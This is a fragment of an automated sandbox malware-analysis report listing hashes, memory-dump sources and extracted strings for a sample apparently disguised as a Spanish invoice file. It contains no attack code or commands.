                                  • Instruction ID: 7fcb4b865470dc55e0ab77ba0a88268e669895397379468ccb02beb12029cfa3
                                  • Opcode Fuzzy Hash: 16f3565602a39e59d180479155dbd8ad3e8111aacea566f3e6b2a315e2912470
                                  • Instruction Fuzzy Hash: BE5179B59047429BE324DF74C5807A7B7E4AF84705F00983EE9EA97240EB74D646CFA2
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: T>l$T>l(
                                  • API String ID: 3446177414-2702479517
                                  • Opcode ID: f885e82d2c6375ac2d9e14c6967a4e4bdb2551c468baf06de15a3331c66c99b5
                                  • Instruction ID: 63ea3c5c73508bac9a68c7f03517d76c749a0e18a8966401d9220d49820a914d
                                  • Opcode Fuzzy Hash: f885e82d2c6375ac2d9e14c6967a4e4bdb2551c468baf06de15a3331c66c99b5
                                  • Instruction Fuzzy Hash: 3D417E729043419FD360DF29C844B9BBBE8FF88764F404A2EF598D7291DB709A45CB92
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: 0$0
                                  • API String ID: 3446177414-203156872
                                  • Opcode ID: c174cd5c65a254dbe81554381a606f2f872b648178dd0850bdd271e3ea4b63e6
                                  • Instruction ID: 0f21ce7f49df30f5de89f4cd1c9c10482e0d240116abd613d02019f2cb3dbfaf
                                  • Opcode Fuzzy Hash: c174cd5c65a254dbe81554381a606f2f872b648178dd0850bdd271e3ea4b63e6
                                  • Instruction Fuzzy Hash: 51415CB6A08705DFD301CF28C494A1ABBE4BB88354F04492EF989DB341D771EA46CF96
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p$T>l(
                                  • API String ID: 3446177414-3982621871
                                  • Opcode ID: e5765edba49cf75c832b961c144db328c0598b1b5614b0c20b6e4bd10d2cd9cd
                                  • Instruction ID: 8d383c7d92858ed218cc7b733c3c89977ca65c8279ffe95bfe46054b22efe8cb
                                  • Opcode Fuzzy Hash: e5765edba49cf75c832b961c144db328c0598b1b5614b0c20b6e4bd10d2cd9cd
                                  • Instruction Fuzzy Hash: 423135BAE41604AFD701DF68CD00F5ABBB5FF84714F508665F900E7280C735AA41CB90